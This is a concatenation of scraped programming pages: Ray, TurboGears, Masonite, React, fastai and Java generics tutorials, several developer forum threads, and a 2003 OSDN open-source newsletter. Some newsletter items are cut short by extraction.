This example is easy to parallelize because the network can play ten games in parallel and no information needs to be shared between the games. In the loop, the network repeatedly plays games of Pong and records a gradient from each game. Every ten games, the gradients are combined together and used to update the network.

iterations = 20
batch_size = 4
model = Model()
actors = [RolloutWorker.remote() for _ in range(batch_size)]

running_reward = None
# Update buffers that add up gradients over a batch.
grad_buffer = {k: np.zeros_like(v) for k, v in model.weights.items()}
# Update the rmsprop memory.
rmsprop_cache = {k: np.zeros_like(v) for k, v in model.weights.items()}

for i in range(1, 1 + iterations):
    model_id = ray.put(model)
    gradient_ids = []
    # Launch tasks to compute gradients from multiple rollouts in parallel.
    start_time = time.time()
    gradient_ids = [
        actor.compute_gradient.remote(model_id) for actor in actors
    ]
    for batch in range(batch_size):
        [grad_id], gradient_ids = ray.wait(gradient_ids)
        grad, reward_sum = ray.get(grad_id)
        # Accumulate the gradient over batch.
        for k in model.weights:
            grad_buffer[k] += grad[k]
        running_reward = (reward_sum if running_reward is None else
                          running_reward * 0.99 + reward_sum * 0.01)
    end_time = time.time()
    print("Batch {} computed {} rollouts in {} seconds, "
          "running mean is {}".format(i, batch_size, end_time - start_time,
                                      running_reward))
    model.update(grad_buffer, rmsprop_cache, learning_rate, decay_rate)
    zero_grads(grad_buffer)
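As a sanity check on the discounting logic in process_rewards, the same recurrence can be run in plain Python on a tiny reward vector (this snippet is standalone and does not need Ray, Gym, or NumPy):

```python
gamma = 0.99  # Same discount factor as above.

def discount(rewards):
    # value[t] = r[t] + gamma * value[t + 1], resetting the running
    # sum at game boundaries (nonzero rewards), as in process_rewards.
    out, running = [0.0] * len(rewards), 0.0
    for t in reversed(range(len(rewards))):
        if rewards[t] != 0:
            running = 0.0
        running = running * gamma + rewards[t]
        out[t] = running
    return out

# Two timesteps of nothing followed by a win: the final reward is
# worth 1.0, one step earlier 0.99, two steps earlier 0.99 ** 2.
print([round(v, 4) for v in discount([0.0, 0.0, 1.0])])  # [0.9801, 0.99, 1.0]
```

The game-boundary reset is what keeps rewards from one Pong point from leaking into the credit assignment of the previous point.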
https://docs.ray.io/en/master/auto_examples/plot_pong_example.html
About BrowserLimit

BrowserLimit is a TurboGears2 extension meant to quickly limit access to a website to modern browsers only. BrowserLimit requires TurboGears 2.1.4 or newer.

Installing

tgext.browserlimit can be installed both from PyPI and from Bitbucket:

easy_install tgext.browserlimit

should just work for most users.

Enabling BrowserLimit

Using BrowserLimit is quite simple: you can just plug it in using tgext.pluggable. If you want to avoid using tgext.pluggable for any reason, it is still possible to use tgext.browserlimit by setting it up manually. At the end of your application's config/app_cfg.py import tgext.browserlimit:

import tgext.browserlimit
tgext.browserlimit.plugme(base_config, {})

Choosing Browser Limits

By default tgext.browserlimit will limit site access to browsers which have fairly complete HTML4 support; those include IE8, Chrome 4, Firefox 3.6 and Safari 3.2. This can be changed by specifying the base_config.browserlimit option inside your config/app_cfg.py before loading browserlimit. Valid values are:

- MODERN -> Most modern browsers with top edge features
- HTML5 -> Minimal HTML5 support like video and canvas
- BASIC -> Good HTML4 support (the default)
- MINIMAL -> Cover as much as possible (minimum IE version 7)

New limits can be enabled using the base_config.browserlimits option. This must be a dictionary where the key is the limit name and the value is a class that implements the __init__(self, user_agent) and is_met(self, environ) -> bool methods.
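A custom limit class only needs the two methods described above. As a sketch, here is a hypothetical limit (the class name and matching rule are illustrative, not from the tgext.browserlimit source) that admits only user agents mentioning Firefox:

```python
class FirefoxOnlyLimit(object):
    """Hypothetical custom limit: only Firefox user agents pass."""

    def __init__(self, user_agent):
        # The extension constructs the limit with the request's user agent.
        self.user_agent = user_agent or ''

    def is_met(self, environ):
        # Return True when the browser satisfies the limit.
        return 'Firefox' in self.user_agent

# It would then be registered (per the docs above) as a value in the
# base_config.browserlimits dictionary under a limit name of your choosing.
```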
https://bitbucket.org/devilicecream/tgext.browserlimit
I am having trouble with the GraphLCDIntrf and emFile components. I created a project with the LCD interface and got it working. I then added the emFile component and added all the necessary links to the additional directories. But when I build the project I get a build error: "prj.M0120: Build error: unknown type name 'PTR_ADDR'". I've created another project using the last version of GraphLCDIntrf with the emFile component and didn't have this trouble. I don't know where to look or what to do in order to fix this build error. Attached is the project I'm working on so that you can see what's happening. It's not pretty because I was just testing different functions of emWin.

Thanks, Matt

I cannot explain it, but it seems necessary to make the inclusion of the Global.h file mandatory. Comment out the first and last lines in this file:

//#ifndef GLOBAL_H // Guard against multiple inclusion
.................
//#endif // Avoid multiple inclusion

Should I be in the office tomorrow, I'll give it a shot. Thanks.

Thanks for the help. I tested it out this morning and it appears to be working just fine.
https://community.cypress.com/thread/41962
Masonite Events is a simple-to-use integration for subscribing to events. These events can be placed throughout your application and triggered when various actions occur. For example, you may want to perform several actions when a user signs up, like:

Send an email
Update a section of your database

These actions can all be executed with a single line of code in your controller once you have set up your listeners.

First we'll need to install the package using pip:

$ pip install masonite-events

Once installed we'll need to add the provider to our providers list in config/providers.py:

from events.providers import EventProvider

...

PROVIDERS = [
    ...
    EventProvider,
    ...
]

This Service Provider will add a new event:listener command we can use to create new events. We'll walk through step by step how to create one below.

Masonite Events allows you to subscribe to arbitrary event actions with various event listeners. In this article we will walk through the steps of setting up listeners for a new user subscribing to our application.

We can create our event listener by executing the following command:

$ craft event:listener SubscribeUser

This will create a new event in the app/events directory that looks like this:

""" A SubscribeUser Event """
from events import Event

class SubscribeUser(Event):
    """ SubscribeUser Event Class """

    subscribe = []

    def __init__(self):
        """ Event Class Constructor """
        pass

    def handle(self):
        """ Event Handle Method """
        pass

This is a very simple class. We have the __init__ method, which is resolved by the container, and we have a handle method, also resolved by the container. This means that we can use syntax like:

from masonite.request import Request

...

    def __init__(self, request: Request):
        """ Event Class Constructor """
        self.request = request

...
The subscribe attribute can be used as a shorthand later, which we will see, but it should be a list of events we want to subscribe to:

""" A SubscribeUser Event """
from events import Event
from package.action import SomeAction

class SubscribeUser(Event):
    """ SubscribeUser Event Class """

    subscribe = ['user.subscribed', SomeAction]

    def __init__(self):
        """ Event Class Constructor """
        pass

    def handle(self):
        """ Event Handle Method """
        pass

We can listen to events simply by passing the listener into one of your application's Service Providers' boot methods. Preferably this Service Provider should have wsgi=False so that you are not continuously subscribing the same listener on every request. You likely already have a Service Provider whose wsgi attribute is False, but let's create a new one:

$ craft provider ListenerProvider

Make sure we set the wsgi attribute to False:

''' A ListenerProvider Service Provider '''
from masonite.provider import ServiceProvider

class ListenerProvider(ServiceProvider):

    wsgi = False

    def register(self):
        pass

    def boot(self):
        pass

Now we can import our listener and add it to our boot method:

    def boot(self, event: Event):
        event.subscribe(SubscribeUser)

This is the recommended approach over the more manual approach found below, but both options are available if you find a need for one over the other.

Since we have a subscribe attribute on our listener, we can simply pass the listener into the subscribe method. This will subscribe our listener to the SomeAction and user.subscribed actions that we specified in the subscribe attribute of our listener class.

If we don't specify the actions in the subscribe attribute, we can manually subscribe them using the listen method in our Service Provider's boot method:

    def boot(self, event: Event):
        event.listen('user.subscribed', [SubscribeUser])

Ensure that the second parameter in the listen method is a list, even if it has only a single value.

Now that we have events that are being listened to, we can start firing events. There are two ways to fire events.
We can do both in any part of our application, but we will go over how to do so in a controller method.

from events import Event

...

    def show(self, event: Event):
        event.fire('user.subscribed')

Masonite Events also comes with a new builtin helper method:

    def show(self):
        event('user.subscribed')

Both of these methods will fire all our listeners that are listening to the user.subscribed event action.

As noted briefly above, we can subscribe to classes as events:

from package.action import SomeAction

    def show(self):
        event(SomeAction)

This will go through the same steps as an event subscribed with a string above.

We can also fire events using an * wildcard action:

    def show(self):
        event('user.*')

This will fire events such as user.subscribed, user.created and user.deleted. We can also fire events with an asterisk in the front:

    def show(self):
        event('*.created')

This will fire events such as user.created, dashboard.created and manager.created. We can also fire events with a wildcard in the middle:

    def show(self):
        event('user.*.created')

This will fire events such as user.manager.created, user.employee.created and user.friend.created.

Sometimes you will want to pass an argument from your controller (or wherever you are calling your code) to your event's handle method. In this case you can simply pass keyword arguments to your fire method like so:

    def show(self, event: Event):
        event.fire('user.subscribed', to='[email protected]', active='True')

and you can fetch these values in your handle method using the argument method:

class SubscribeUser(Event):
    """ SubscribeUser Event Class """

    subscribe = ['user.subscribed', SomeAction]

    def __init__(self):
        """ Event Class Constructor """
        pass

    def handle(self):
        """ Event Handle Method """
        self.argument('to')      # [email protected]
        self.argument('active')  # True
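In the wildcard examples above, each * stands for exactly one dot-separated segment of the action name. A small illustrative sketch of that matching logic (not Masonite's actual implementation) makes the rule concrete:

```python
def action_matches(pattern, event):
    """True when each '*' in the pattern stands for exactly one
    dot-separated segment of the event name."""
    p_parts = pattern.split('.')
    e_parts = event.split('.')
    if len(p_parts) != len(e_parts):
        return False
    return all(p == '*' or p == e for p, e in zip(p_parts, e_parts))

print(action_matches('user.*', 'user.subscribed'))               # True
print(action_matches('*.created', 'dashboard.created'))          # True
print(action_matches('user.*.created', 'user.manager.created'))  # True
print(action_matches('user.*', 'user.manager.created'))          # False (extra segment)
```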
https://docs.masoniteproject.com/useful-features/events
Quick and easy

If you've used React, you have obviously passed data down from a parent component to a child using props. This is called uni-directional data flow. What if I showed you a little trick which allows you to conversely pass small chunks of props from the CHILD component back up to the PARENT component?

Here's the trick: very simple. We have 2 components:

Parent: App.js
Child: Child.js

Use the following steps:

1. Create a function inside your parent component, pass it a parameter, and log that parameter using console.log.
2. Pass the function name as props into your child component render.
3. Invoke the function from props inside your child component.
4. Pass in your data as an argument inside the invocation.

Voilà.

Parent component:

import Child from "./Child";

function App() {
  const pull_data = (data) => {
    console.log(data); // LOGS DATA FROM CHILD (My name is Dean Winchester... &)
  };

  return (
    <div className="App">
      <Child func={pull_data} />
    </div>
  );
}

export default App;

Child component:

const Child = (props) => {
  props.func("My name is Dean Winchester & this is my brother Sammie");

  return (
    <>
      <h1>I am the Child Component!</h1>
    </>
  );
};

export default Child;

It's that simple! Also, notice the use of React Fragments <> ... </> inside Child.js. This allows us to create fewer DOM nodes, giving our app a small performance boost. It also helps with debugging (less clutter of divs).

Thanks for reading. I hope this provided some good value. Visit me at PJCodes.com.

Further Reading

Composable Link Component that Works in Any React Meta-Framework
https://plainenglish.io/blog/how-to-pass-props-from-child-to-parent-component-in-react
Out-of-bounds access (ARRAY_VS_SINGLETON)
Somebody told me this and I agree with this alternative. You cannot store the result of sprintf...

Out-of-bounds access (ARRAY_VS_SINGLETON)
Need a little help.
[code]
#include <iostream>

int main()
{
    int bit = 1;
    int init = 0xf ^ (1 <<...

Resource leak..
Yes. Smart pointers seem to be the optimal solution to avoid these kinds of leaks. Thanks.

Resource leak..
[code]
#include <iostream>

int* func_b()
{
    int *c = new int;
    return c;
}

int main()
{
    int* b ...

Interesting puzzle + function pointers?
I think my question is not clear to everyone here who is trying to answer it. Let me try to explain ...
http://www.cplusplus.com/user/bhargavah/
#include <string>

A plugin is a dynamic library which has a unique name and can be loaded into a running application. In case the loading is done by an Orocos TaskContext, the plugin is notified of the loading TaskContext. A plugin can refuse to load, in which case the library should be unloaded from the application again. Once loaded, a plugin remains in the current process until the process exits.

Definition in file Plugin.hpp.

Return the unique name of this plugin. No two plugins with the same name will be allowed to live in a single process.

Instructs this plugin to load itself into the application. Implement in this function any startup code your plugin requires. This function should not throw.
http://people.mech.kuleuven.be/~orocos/pub/stable/documentation/rtt/v1.8.x/api/html/Plugin_8hpp.html
1.1. INSTALL THE PACKAGES

Let's install the packages and download the data using the commands shown below.

# Install the packages
!pip install
!pip install fastai==0.7.0
!pip install torchtext==0.2.3
!pip install opencv-python
!apt update && apt install -y libsm6 libxext6
!pip3 install
!pip3 install torchvision

# Download the Data to the required folder
!mkdir data
!wget -P data/
!wget -P data/
!tar -xf data/VOCtrainval_06-Nov-2007.tar -C data/
!unzip data/PASCAL_VOC.zip -d data/
!rm -rf data/PASCAL_VOC.zip data/VOCtrainval_06-Nov-2007.tar

%matplotlib inline
%reload_ext autoreload
%autoreload 2

!pip install Pillow

from fastai.conv_learner import *
from fastai.dataset import *
from pathlib import Path
import json
import PIL
from matplotlib import patches, patheffects

Let's check what's present in our data. We will be using the Python 3 standard library pathlib for our paths and file access.

1.2. KNOW YOUR DATA USING THE Pathlib OBJECT

The data folder contains different versions of Pascal VOC.

PATH = Path('data')
list((PATH/'PASCAL_VOC').iterdir())
# iterdir() helps in iterating through the directory of PASCAL_VOC

- PATH gives object-oriented access to a directory or file. It's part of the Python library pathlib. To see how to leverage the pathlib functions, use tab completion on PATH.
- Since we will be working only with pascal_train2007.json, let's check out the content of this file.

training_json = json.load((PATH/'PASCAL_VOC'/'pascal_train2007.json').open())
# training_json is a dictionary variable.
# As we can see, a Pathlib object has an open method.
# json.load is part of the JSON (JavaScript Object Notation) library that
# we imported earlier.

training_json.keys()

This file contains the Images, Type, Annotations and Categories. To make use of tab completion, save each in an appropriate variable name.
IMAGES, ANNOTATIONS, CATEGORIES = ['images', 'annotations', 'categories']

Let's see in detail what each of these contains:

- The IMAGES consist of the image name, its height, width and image id.
- The ANNOTATIONS consist of the area, bbox (bounding box) and category_id (each category id has a class, or name, associated with it).
- Some of the images have a polygon segmentation, i.e. a polygon outline around the object in the image. It's not important to our discussion.
- The ignore flag says to ignore the object in the image if the ignore flag = 1 (True).
- The CATEGORIES consist of a class (name) and an ID associated with it.

For easy access to all of these, let's convert the important pieces into dictionary and list comprehensions.

FILE_NAME, ID, IMG_ID, CATEGORY_ID, BBOX = 'file_name', 'id', 'image_id', 'category_id', 'bbox'

categories = {o[ID]: o['name'] for o in training_json[CATEGORIES]}
# categories is a dictionary mapping each ID to its class name.
# Let's check out all of the 20 categories using the command below.
categories

training_filenames = {o[ID]: o[FILE_NAME] for o in training_json[IMAGES]}
training_filenames  # contains the id and the filename of the images.

training_ids = [o[ID] for o in training_json[IMAGES]]
training_ids  # This is a list comprehension.

Now, let's check out the folder where we have all the images.

list((PATH/'VOCdevkit'/'VOC2007').iterdir())
# The JPEGImages folder is the one with all the images in it.

JPEGS = 'VOCdevkit/VOC2007/JPEGImages'
IMG_PATH = PATH/JPEGS  # Set the path of the images as IMG_PATH
list(IMG_PATH.iterdir())[:5]

Note: Each image has a unique id associated with it, as shown above.
Check out the image below. - After passing the coordinates via hw_bb() function which is used to convert height_width to bounding_box, we get the coordinates of the top left and bottom right corner and in the form of (rows and columns). def hw_bb(bb): return np.array([bb[1], bb[0], bb[3]+bb[1]-1, bb[2]+bb[0]-1]) - Now , we will create a dictionary which has the image id as the key and its bounding box coordinate and the category_id as the values. # Python's defaultdict is useful any time you want to have a default # dictionary entry for new keys. If you try and access a key that doesn’t # exist, it magically makes itself exist and # it sets itself equal to the return value of the function you specify # (in this case lambda:[]). training_annotations = collections.defaultdict(lambda:[]) for o in training_json[ANNOTATIONS]: if not o['ignore']: bb = o[BBOX] bb = hw_bb(bb) training_annotations[o[IMG_ID]].append((bb,o[CATEGORY_ID])) - In the above chunk of code, we are going through all the annotations , and considering those which doesn’t say ignore . After that we append it to a dictionary where the values are the Bounding box (bbox )and the category_id(class) to its corresponding image id which is the key. - One problem is that if there is no dictionary item that exist yet, then we can’t append any list of bbox and class to it . To resolve this issue we are making use of Python’s defaultdict using the below line of code. training_annotations = collections.defaultdict(lambda:[]) - Its a dictionary but if we are accessing a key that isn’t present , then defaultdictmagically creates one and sets itself equals to the value that the function returns . In this case its an empty list. So every time we access the keys in the training annotations and if it doesn’t exist , defaultdictmakes a new empty list and we can append to it. SUMMARY OF THE USEFUL IMAGE RELATED INFORMATION Lets get into the details of the annotations of a particular image. 
As we can see in the snapshot below:

- We take a particular image.
- We get its annotation, i.e. the bounding box and the class of the object in the bbox. This tells us what objects are present in the image along with their coordinates.
- We check what that class refers to. In this case the class, or category, is a car.

Some libraries take VOC-format bounding boxes, so the bb_hw() function helps in resetting the dimensions into the original format:

bb_voc = [155, 96, 196, 174]
bb_fastai = hw_bb(bb_voc)

# We won't be using the below function for now.
def bb_hw(a):
    return np.array([a[1], a[0], a[3]-a[1]+1, a[2]-a[0]+1])
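A quick sanity check, using the bb_voc example above, that bb_hw inverts hw_bb: VOC boxes are (column, row, width, height), while the converted boxes are (top-left row, top-left column, bottom-right row, bottom-right column).

```python
import numpy as np

def hw_bb(bb):
    # VOC (col, row, width, height) -> (top row, left col, bottom row, right col)
    return np.array([bb[1], bb[0], bb[3] + bb[1] - 1, bb[2] + bb[0] - 1])

def bb_hw(a):
    # Inverse conversion back to VOC format
    return np.array([a[1], a[0], a[3] - a[1] + 1, a[2] - a[0] + 1])

bb_voc = [155, 96, 196, 174]
bb_fastai = hw_bb(bb_voc)
print(bb_fastai)           # [96, 155, 269, 350] in fastai order
print(bb_hw(bb_fastai))    # round-trips back to [155, 96, 196, 174]
```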
https://coinerblog.com/single-object-detection-e65a537a1c31/
Passing Task attributes to main process
JKoslowski Jan 18, 2017 9:55 AM

I am building an onboarding process and we have two groups of technicians (Application Support and Technical Support). At one step in the process it creates two tasks and assigns one to the Technical Support group and the other to the Application Support group. Each group then completes their task and marks it as complete. I'd like to then display these fields from each task in the main Onboarding process window, but am unsure of the best way to do this. I've created a separate task process for each group so that I can set different flags and send different notifications when each group has completed their tasks. Thoughts?

Summary: I want to display attributes from two different tasks on the main window.

1. Re: Passing Task attributes to main process
rs090 Jan 18, 2017 11:53 AM (in response to JKoslowski)

Are the tasks already visible as a collection at the bottom of your onboarding window, or are the tasks and onboarding screen two separate objects completely, in that the techs can't get to the task from the onboarding window?

2. Re: Passing Task attributes to main process
JKoslowski Jan 18, 2017 12:00 PM (in response to rs090)

Correct, they are viewable as a collection at the bottom. However, I'd like to have them displayed on the onboarding screen. I'm assuming I need to copy the attributes over to the onboarding object somehow.

3. Re: Passing Task attributes to main process
rs090 Jan 18, 2017 12:26 PM (in response to JKoslowski)

I don't know of a way you could add additional fields directly from the collection, but you can change the data that's displayed on the collection tab, which may be what you're wanting. See this How to: Set Default Query for Collections in Web Desk - Changing the Columns you see in the tab

Another option, and this is just an idea for testing, is to drag your task object onto your onboarding module in Object Designer; when prompted, choose no to creating a collection.
This would create an additional relationship to the task object, so in Window Manager on your onboarding window you would now be able to select the individual fields from the task(s) modules. Not sure if it would show the right task info though, but maybe worth a quick test.

4. Re: Passing Task attributes to main process
JKoslowski Jan 19, 2017 3:05 PM (in response to JKoslowski)
1 of 1 people found this helpful

Worked with Mr. Roche at Landesk and we ended up creating a calculation on the Activity.NetworkLogin attribute to pull the networklogin attribute from the activity tasks collection. The calculation updates when a task is marked as complete and skips any null entries.

import System
static def GetAttributeValue(Activity):
	Value = ''
	for Tasks in Activity.Tasks:
		if Tasks._NetworkLogin != null:
			Value = Tasks._NetworkLogin
	return Value

Dependency: Tasks/Completions

So I just have to do this for each field that gets passed to the main object from the tasks.

Calculation Writing Tutorial - 4. Working with Collections and Loops
https://community.ivanti.com/thread/34711
Lower Bounds

Wildcard instantiations actually allow another type of bound, called a lower bound, as well. A lower bound is specified with the keyword super and requires that instantiations be of a certain type or any of its supertypes, up to the upper bound of the type variable or Object. Consider the following classes and statement:

The wildcard instantiation Gen<? super Data3> obj123 creates a type that can hold any instantiation of Gen on the type Data3 or any of its supertypes. That means the wildcard type can be assigned one of only four types: Gen<Data3>, Gen<Data2>, Gen<Data1> or Gen<Object>. We have cut off the object inheritance hierarchy after four generations. No subclasses of Data3 can be used.

We know that the element type of any instantiation matching our lower-bounded wildcard must be Data3 or one of its supertypes. So, we can write to the object through our lower-bounded wildcard instantiation obj123, as long as what we write is of type Data3 or one of its subclasses. For example:

We cannot write supertypes of Data3, because the compiler does not know which supertype of Data3 the elements are. For example:

We cannot read the elements as any specific type through the lower-bounded wildcard instantiation; we can only read them as the upper bound of the type variable, because the compiler does not know which supertype the elements actually are. So, we can always read the type as Object through our wildcard instantiation. The type Object is the default upper bound. For example:

One last thing about lower bounds: only the wildcard instantiation syntax can use the super keyword to refer to lower bounds.
Bounds of type variables in generic class declarations cannot have lower bounds:

Program

class Data1 {
    int da1;
    Data1(int d1) {
        da1 = d1;
    }
}

class Data2 extends Data1 {
    int da2;
    Data2(int d1, int d2) {
        super(d1);
        da2 = d2;
    }
}

class Data3 extends Data2 {
    int da3;
    Data3(int d1, int d2, int d3) {
        super(d1, d2);
        da3 = d3;
    }
}

class Data4 extends Data3 {
    int da4;
    Data4(int d1, int d2, int d3, int d4) {
        super(d1, d2, d3);
        da4 = d4;
    }
}

class Data5 extends Data4 {
    int da5;
    Data5(int d1, int d2, int d3, int d4, int d5) {
        super(d1, d2, d3, d4);
        da5 = d5;
    }
}

class Gen<T> {
    T tarray[];
    Gen(T tar[]) {
        tarray = tar;
    }
    void setT(int pos, T t) {
        tarray[pos] = t;
    }
    T getT(int pos) {
        return tarray[pos];
    }
}

public class Javaapp {
    public static void main(String[] args) {
        Gen<? super Data3> data123 = new Gen<Data2>(new Data2[5]);
        data123.setT(0, new Data3(10, 20, 30));
        data123.setT(1, new Data4(10, 20, 30, 40));
        data123.setT(2, new Data5(10, 20, 30, 40, 50));
    }
}
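The write/read asymmetry described above can be shown in a minimal self-contained sketch (the class names A, B, C and Box are illustrative stand-ins for the Data hierarchy and Gen): writes through a lower-bounded wildcard accept the bound type and its subclasses, while reads only come back typed as Object.

```java
class A {}
class B extends A {}
class C extends B {}

class Box<T> {
    T value;
    void set(T t) { value = t; }
    T get() { return value; }
}

public class LowerBoundDemo {
    public static void main(String[] args) {
        Box<? super B> box = new Box<A>();  // A is a supertype of B
        box.set(new B());    // OK: B itself
        box.set(new C());    // OK: C is a subclass of B
        // box.set(new A()); // would not compile: A is a supertype of B
        Object read = box.get();  // reads come back typed as Object
        if (!(read instanceof C)) throw new AssertionError();
        System.out.println("read back as Object; runtime class is "
                + read.getClass().getSimpleName());
    }
}
```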
https://hajsoftutorial.com/java-lower-bounds/
O | S | D | N NEWSLETTER
June 10, 2003
DEVELOPER SERIES

The 'Developer Series' Newsletter is developed to bring Open Source related content to users, with a focus on development with Open Source. If you'd like to receive more content relating to Open Source, subscribe at

==============================================================
Sponsored by ThinkGeek
==============================================================

Sourceforge

OpenEJB 0.9.2 released

The 0.9.2 release is one that the whole team is quite proud of. OpenEJB 0.9.0 marked our first release with special Tomcat embedded support. Thanks to all the user feedback, that support has just gotten better and better. The 0.9.2 release contains a neat surprise for OpenEJB/Tomcat users -- TOOLS! The new integration features a webapp with a setup verifier, JNDI browser, EJB viewer, class browser, and even an object invoker! You can browse the OpenEJB namespace and know right away exactly where the EJB is and what it is called. When you find one you like, just click it and it will open up in the EJB viewer. While there you can check out its home, remote and bean classes in the class browser. The object invoker allows you to actually create and invoke your EJBs without writing a single line of code. OpenEJB 0.9.2 also contains a new openejb.base variable to complement the openejb.home variable.
The openejb.base variable allows you to have several configurations of OpenEJB all running against the same OpenEJB install. This makes using OpenEJB in IDEs like Eclipse or NetBeans even easier. Move the openejb_loader-0.9.2.jar into your project's lib directory, set the openejb.base, and you'll be debugging your EJB apps front-to-back without the need for remote debugging support or special editor plug-ins. Thanks to all the OpenEJB users for all the great ideas! You speak, we listen.

LTI-Lib Version Beta 1.9.3 released

LTI-Lib is an object oriented computer vision library written in C++ for Windows/MS-VC++ and Linux/gcc. It provides lots of functionality to solve mathematical problems, many image processing algorithms, some classification tools and much more. This release provides new functors and features, many bug fixes and more documentation.

Download
--------
You can get this and previous releases from:

Homepage
--------
For more information please visit our homepage:

ChangeLog
---------
For more details about the changes in this release please visit the ChangeLog page at:

Acknowledgments
---------------
Thanks to all developers at the Chair of Computer Science: Suat Akyol, Pablo Alvarado, Daniel Beier, Axel Berner, Ulrich Canzler, Peter Doerfler, Thomas Erger, Holger Fillbrandt, Peter Gerber, Claudia Goenner, Xin Gu, Michael Haehnel, Christian Harte, Bastian Ibach, Torsten Kaemper, Thomas Krueger, Frederik Lange, Henning Luepschen, Peter Mathes, Alexandros Matsikis, Bernd Mussman, Jens Paustenbach, Norman Pfeil, Jens Rietzschel, Daniel Ruijters, Thomas Rusert, Stefan Syberichs, Guy Wafo Moudhe, Ruediger Weiler, Jochen Wickel, Benni Winkler, Xinghan Yu, Marius Wolf, Joerg Zieren

Gallery v1.3.4 Release Candidate 2 available

Gallery v1.3.4 Release Candidate 2 - This is the second (and, we fully expect, final) *release candidate* for Gallery v1.3.4.
Changes from RC1 essentially amount to small fixes for errors discovered since the first release candidate in the backup_albums.php script and the new "custom fields" code. Gallery is a slick, intuitive web-based photo gallery with authenticated users and privileged albums. It is easy to install, configure and use. Photo management includes automatic thumbnails, resizing, rotation, etc. User privileges make this great for communities.

Download it:
Read more about this release candidate:

phpwsBB 0.1.0 released

phpwsBB is a native bulletin board module for the phpWebSite content management system, version 0.9.2 or later. Today we release version 0.1.0 of phpwsBB. Features include anonymous posting, message editing and deletion for registered users, thread locking and message forking for admins, and ... well, that's probably it.

Be sure you have the latest version of phpWebSite installed: and then download phpwsbb from:

Aleph One 2003-05-30 Mac OS X Carbon and Windows releases

Aleph One plays Marathon 2, Marathon Infinity, and third-party content on a wide array of platforms with numerous enhancements. The new Mac OS X Carbon and Windows SDL 2003-05-30 releases add significantly improved Internet play, Lua scripting, Speex compression for realtime network audio (making it much more practical in Internet games), an anisotropic filtering option on video cards that support it, and more.

Slashdot

Jabber Gathers Steam In Australia

Jeremy Lunn writes "Jabber is on a rolling start in Australia with this article featured in The Age in Melbourne (and the Sydney Morning Herald), 'Jabbering classes push for more power', and the formation of Jabber Australia."

Linux Rocket Blasts Off This Fall

HardcoreGamer writes "An Oregon amateur rocket group, the Portland State Aerospace Society, plans to launch. The group will present a paper (HTML | PDF) on the use of free software in rocketry at Usenix 2003.
The real question is whether their network card will survive 10 seconds at 15 Gs!"

UCITA Stalled At State Level

OscarGunther writes "Four states have passed anti-UCITA laws and Massachusetts may soon become the fifth. Meanwhile, only two states have adopted the Uniform Computer Information Transactions Act, which gives software vendors all the benefits and none of the burdens of the consequences of publishing their software. The details can be found at ComputerWorld and an opinion piece by Frank Hayes can be found here."

Foundstone Shoe On Other Foot

Cimmer writes "One of the premier hack shops (to pun or not to pun) gets busted for unethically ethically hacking. After filing a lawsuit against former employee JD Glaser for supposedly jacking company source code, Foundstone gets nailed for massive internal software piracy. Tonight's entree: Foot in Mouth."

AAC Put To The Test

technology is sexy writes "Following the increasing popularity of AAC in online music stores and the growing number of implementations in software and hardware, the format is now being put to the test. How well does Apple's implementation fare against Ahead Nero, Sorenson or the open source FAAC at the popular bitrate of 128kbps? Find out for yourself and help by submitting the results. You can find instructions on how to participate here. The best AAC codec gets to face MP3, MP3Pro, Vorbis, MusePack and WMA in the next test. Previous test results at 64kbps can be found here."

SuSE Linux Desktop 1.0 Reviewed

LinuxLasVegas writes "SuSE announced a new release today titled "SuSE Linux Desktop 1.0". The distro is built on SuSE Linux Enterprise Server 8.x technology and comes with CrossOver Office 2.0. Mad Penguin has the first review of this release.
From what I read, it seems like a good release, but for the $600 price tag, I'm not sure if it would be worth the jump..." Links 0. 1. 2. 3. Inappropriate Spam Reaching Children? [0]peeweejd writes "Wired has an article stating that four out of five children [1 [2]survey originator Symantec's press release - and yes, Symantec does sell mail filtering software. Links 0. mailto:[EMAIL PROTECTED] 1. 2. Implementing WiFi in the Real World John Jorsett writes "Seduced, MSN author Paul Boutin hired a Wi-Fi engineer [0]to help him bathe his property in 802.11 waves, using only mass-market consumer hardware." Links 0. Why Johnny Can't Handwrite [0]theodp writes "Handwriting experts fear that the wild popularity of e-mail and IM, particularly among kids, [1." Links 0. mailto:[EMAIL PROTECTED] 1. Which Red Hat Should Be Worn in the Enterprise? [0." Links 0. mailto:[EMAIL PROTECTED] Freshmeat 3D Battle Go 1 3D Battle Go is a 3D arcade version of the ancient Chinese board game Go. It expands Go using a tetrahedral lattice structure that is similar enough in certain aspects to a 2D grid that the game is fun and playable, but definitely not isomorphic to the 2D structure. It uses OpenGL and works much better with a 3D graphics card. adcfw-log 0.8.2 ad. ANTLR plugin for Eclipse 1.0.4 This project adds plugins for the lexer/parser generator ANTLR to the Eclipse platform. The plugins provide a grammar file editor with syntax highlighting, an outline view, and a project nature with an incremental builder. Bitstream Vera TrueType font RPM 1 The Bitstream Vera TrueType font RPM installs the Vera font in /usr/share/fonts and symlinks it into the OpenOffice font directory. It automatically makes the fonts recognizable by the system, and sets it as the default font for the Sans and Sans-Serif font types. Blassic 0.5.7 Blassic is a classic Basic interpreter. The line numbers are mandatory, and it has PEEK & POKE.
The main goal is to execute programs written in old interpreters, but it can be used as a scripting language. BRL 2.2 BRL is a language designed for server-side WWW-based applications, particularly database applications. It is based on Scheme, which makes the syntax extremely simple yet powerful. This implementation is a Java Servlet using the Kawa Scheme compiler. cacti 0.8.1. Cewolf 0.9 beta1 Cewolf can be used inside a Servlet/JSP-based Web application to embed complex graphical charts of all kinds (e.g. line, pie, bar chart, plots, etc.) into a Web page. It provides a full-featured tag library to define all properties of the chart (colors, strokes, legend, etc.), thus the JSP which embeds the chart is not polluted with any Java code. Everything is described with XML-compliant tags. cglib 1.0 cglib is a set of utility classes that can be used to generate and load Java classes at runtime. Civil 0.82 Civil is a cross-platform, turn-based, networked strategy game that allows players to take part in scenarios set during the American Civil War. It simulates battles on a company level (a company is roughly 100 men). COMMpositeur 030609 COMMpositeur is a simple document management system implemented as a collection of modules for the phpGroupWare application framework. It helps electronic journals to manage metadata about articles and to automate the generation of published formats (HTML and PDF) from articles in a raw format (RTF) using external tools. CvsKnit 0.9.9 CvsKnit is a CVS automation suite to knit up various CVS repositories from existing source packages. This may be useful for starting revision management with CVS, figuring out when a file had been added, modified, or removed, or for browsing source diffs or annotating between packages via a Web interface. D Parser 1.2 The D Parser is a scannerless GLR parser generator based on the Tomita algorithm. It is self-hosted and very easy to use.
